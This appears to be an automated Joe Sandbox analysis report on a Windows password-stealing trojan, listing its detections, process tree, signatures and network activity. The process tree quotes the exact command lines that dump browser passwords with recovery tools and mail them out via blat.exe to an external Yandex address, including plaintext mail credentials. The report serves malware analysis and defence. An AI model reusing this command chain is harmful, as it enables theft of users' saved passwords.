Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0zu73p2YBu.exe

Overview

General Information

Sample name:0zu73p2YBu.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
Analysis ID:1559606
MD5:29eca65ffa92a3f877b59df42e2150ed
SHA1:df50e54f9a2b5b6b8831a1e967fba1292ef31790
SHA256:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
Infos:

Detection

Chrome Password Stealer, Fox Password Stealer, Opera Password Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Chrome Password Stealer
Yara detected Fox Password Stealer
Yara detected Opera Password Stealer
AI detected suspicious sample
Contains functionality to steal Internet Explorer form passwords
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Outbound SMTP Connections
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 0zu73p2YBu.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\0zu73p2YBu.exe" MD5: 29ECA65FFA92A3F877B59DF42E2150ED)
    • .exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Temp\ .exe" MD5: 6867A307FDB19A4B89696F07FBFB1847)
      • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7812 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • OperaPassView.exe (PID: 7972 cmdline: OperaPassView.exe /stext user-PC_OperaPassView.txt MD5: 8B4AE559AD7836B27EE9F8F171BE8139)
        • PING.EXE (PID: 7980 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • PasswordFox.exe (PID: 8052 cmdline: PasswordFox.exe /stext user-PC_PasswordFox.txt MD5: CC84065F23CFC3D980AAD38EFC648DE6)
        • PING.EXE (PID: 8060 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • iepv.exe (PID: 8096 cmdline: iepv.exe /stext user-PC_iepv.txt MD5: C861FE184E271D6E2BA958DA306BA748)
        • PING.EXE (PID: 8104 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • ChromePass.exe (PID: 8164 cmdline: ChromePass.exe /stext user-PC_ChromePass.txt MD5: CB271441FA19AC163ECF380C8EBB3109)
        • PING.EXE (PID: 8172 cmdline: ping -n 120 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 7972 cmdline: blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5 MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 6736 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 6432 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 7984 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 8112 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 8108 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 8164 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "user-PC_iepv.txt" -body "ie" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 2260 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 2720 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 2140 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmpJoeSecurity_FoxPasswordStealerYara detected Fox Password StealerJoe Security
    Process Memory Space: OperaPassView.exe PID: 7972JoeSecurity_OperaPasswordStealerYara detected Opera Password StealerJoe Security
      Process Memory Space: PasswordFox.exe PID: 8052JoeSecurity_FoxPasswordStealerYara detected Fox Password StealerJoe Security
        Process Memory Space: ChromePass.exe PID: 8164JoeSecurity_ChromePasswordStealerYara detected Chrome Password StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.PasswordFox.exe.400000.0.unpackJoeSecurity_FoxPasswordStealerYara detected Fox Password StealerJoe Security
            9.2.OperaPassView.exe.400000.0.unpackJoeSecurity_OperaPasswordStealerYara detected Opera Password StealerJoe Security

              Sigma Signatures

              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\0zu73p2YBu.exe, ProcessId: 7292, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Sigma detected: Suspicious Outbound SMTP Connections
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe, Initiated: true, ProcessId: 6432, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49773

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 0zu73p2YBu.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeAvira: detection malicious, Label: SPR/PassFox.R
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeAvira: detection malicious, Label: SPR/PSW.Gen
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeReversingLabs: Detection: 60%
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeReversingLabs: Detection: 60%
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeReversingLabs: Detection: 76%
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeReversingLabs: Detection: 71%
              Multi AV Scanner detection for submitted file
              Source: 0zu73p2YBu.exeReversingLabs: Detection: 100%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\ .exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 0zu73p2YBu.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040345F CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,13_2_0040345F
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_00403C66 memcmp,memset,memset,memset,memset,MultiByteToWideChar,MultiByteToWideChar,memcmp,LocalAlloc,memcpy,CryptDecrypt,LocalFree,GetLastError,13_2_00403C66
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_004034C9 CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,13_2_004034C9
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_00403635 CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam,13_2_00403635
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_004036F8 memset,memset,memset,memcpy,memcpy,CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptDestroyHash,13_2_004036F8
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040369A CryptHashData,CryptDeriveKey,CryptDestroyHash,13_2_0040369A
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040337E CryptReleaseContext,13_2_0040337E
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_00403391 CryptAcquireContextA,GetLastError,13_2_00403391
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_004028C0 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,15_2_004028C0
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0040315B memcmp,memset,memset,memset,memset,memcmp,LocalAlloc,memcpy,CryptDecrypt,LocalFree,GetLastError,15_2_0040315B
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0040292A CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,15_2_0040292A
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00402AFB CryptHashData,CryptDeriveKey,CryptDestroyHash,15_2_00402AFB
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00402A96 CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam,15_2_00402A96
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00402B59 memset,memset,memset,memcpy,memcpy,CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptDestroyHash,15_2_00402B59
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00408E80 CryptReleaseContext,??3@YAXPAX@Z,15_2_00408E80
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_004027EF CryptAcquireContextW,GetLastError,15_2_004027EF
              Source: 0zu73p2YBu.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Binary string: z:\Projects\VS2005\OperaPassView\Release\OperaPassView.pdb source: OperaPassView.exe, OperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: .pdb?P source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, OperaPassView.exe, 00000009.00000000.1722119973.000000000040E000.00000080.00000001.01000000.0000000D.sdmp, OperaPassView.exe.1.dr
              Source: Binary string: z:\Projects\VS2005\iepv\Release\iepv.pdb source: iepv.exe, iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: z:\Projects\VS2005\PasswordFox\Release\PasswordFox.pdb source: PasswordFox.exe, PasswordFox.exe, 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: z:\Projects\VS2005\ChromePass\Release\ChromePass.pdb source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_0040518C FindFirstFileW,FindNextFileW,wcslen,wcslen,11_2_0040518C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_00404D0E FindFirstFileW,FindNextFileW,FindClose,11_2_00404D0E
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_004063F9 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_004063F9
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00405798 FindFirstFileW,FindNextFileW,wcslen,wcslen,15_2_00405798
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose,20_2_004058AD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0040B976 lstrcpyA,FindFirstFileA,FindClose,20_2_0040B976
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose,22_2_004058AD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_0040B976 lstrcpyA,FindFirstFileA,FindClose,22_2_0040B976

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
              Source: global trafficTCP traffic: 192.168.2.4:49773 -> 77.88.21.158:587
              Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
              Source: global trafficTCP traffic: 192.168.2.4:49773 -> 77.88.21.158:587
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: smtp.yandex.ru
              Source: global trafficDNS traffic detected: DNS query: yandex.ru
              Source: OperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://https://.savesignIn
              Source: blat.exe.1.drString found in binary or memory: http://www.blat.net
              Source: blat.exe, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drString found in binary or memory: http://www.blat.net)
              Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drString found in binary or memory: http://www.blat.net)User-Agent:
              Source: .exeString found in binary or memory: http://www.blat.net/
              Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.dll.1.drString found in binary or memory: http://www.blat.net/V
              Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395776689.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480455991.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501598450.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583455609.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674118562.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe.1.drString found in binary or memory: http://www.blat.net/h
              Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.drString found in binary or memory: http://www.blat.netX-Mailer:
              Source: iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_00407FBA GetTempPathW,GetWindowsDirectoryW,GetTempFileNameW,OpenClipboard,GetLastError,DeleteFileW,9_2_00407FBA
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_00403B17 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_00403B17
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeCode function: 11_2_004043CD EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004043CD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040561D EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_0040561D
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_004049F5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004049F5
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00405D3C GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetFocus,GetFocus,GetClassNameA,strncmp,GetFocus,SendMessageA,GetPropA,1_2_00405D3C
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00405B1F GetPropA,DefFrameProcA,SetLastError,NtdllDefWindowProc_A,1_2_00405B1F
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00407E1A sprintf,GetPropA,HeapFree,HeapFree,HeapFree,RemovePropA,CallWindowProcA,NtdllDefWindowProc_A,1_2_00407E1A
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00404714 GetWindowLongA,CallWindowProcA,RemovePropA,RemovePropA,RemovePropA,RevokeDragDrop,SetWindowLongA,NtdllDefWindowProc_A,1_2_00404714
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_00401715 NtdllDefWindowProc_A,13_2_00401715
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_004017CF NtdllDefWindowProc_A,13_2_004017CF
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_004069601_2_00406960
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_004598D31_2_004598D3
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_004779411_2_00477941
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00458AB91_2_00458AB9
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00476B261_2_00476B26
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_004573F11_2_004573F1
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_0047544D1_2_0047544D
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00406C101_2_00406C10
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_0046DCF91_2_0046DCF9
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00457D751_2_00457D75
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_0044FD0D1_2_0044FD0D
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_0046E5E91_2_0046E5E9
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_004505FD1_2_004505FD
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00458EAF1_2_00458EAF
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: 1_2_00476F1D1_2_00476F1D
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_004090DD9_2_004090DD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_0040A8879_2_0040A887
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_00402EAC9_2_00402EAC
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_0040291B9_2_0040291B
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeCode function: 9_2_00402DAF9_2_00402DAF
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_004044DE13_2_004044DE
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040454F13_2_0040454F
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_004045C013_2_004045C0
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeCode function: 13_2_0040465113_2_00404651
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0041281D15_2_0041281D
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0042014F15_2_0042014F
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_004039F215_2_004039F2
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00403A6315_2_00403A63
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0041523215_2_00415232
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00403AD415_2_00403AD4
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_00403B6515_2_00403B65
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0041ABA915_2_0041ABA9
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_0040C55815_2_0040C558
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_004275A015_2_004275A0
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: 15_2_004256F015_2_004256F0
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0040806320_2_00408063
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_00411CAB20_2_00411CAB
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0040895320_2_00408953
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0041020F20_2_0041020F
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0041128720_2_00411287
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_00410E9020_2_00410E90
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 20_2_0040F7B720_2_0040F7B7
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_0040806322_2_00408063
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_00411CAB22_2_00411CAB
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_0040895322_2_00408953
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_0041020F22_2_0041020F
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_0041128722_2_00411287
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_00410E9022_2_00410E90
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: 22_2_0040F7B722_2_0040F7B7
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: String function: 0040C0CC appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeCode function: String function: 0040B4A0 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: String function: 00412220 appears 82 times
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: String function: 00401119 appears 117 times
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: String function: 00401292 appears 270 times
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeCode function: String function: 004121F8 appears 54 times
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: String function: 00459E36 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\ .exeCode function: String function: 00477EB6 appears 31 times
              Source: PasswordFox.exe.1.drStatic PE information: Resource name: RT_DIALOG type: COM executable for DOS
              Source: 0zu73p2YBu.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: .exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976262659914712
              Source: ChromePass.exe.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9891438802083333
              Source: PasswordFox.exe.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9922195184426229
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@46/28@2/2
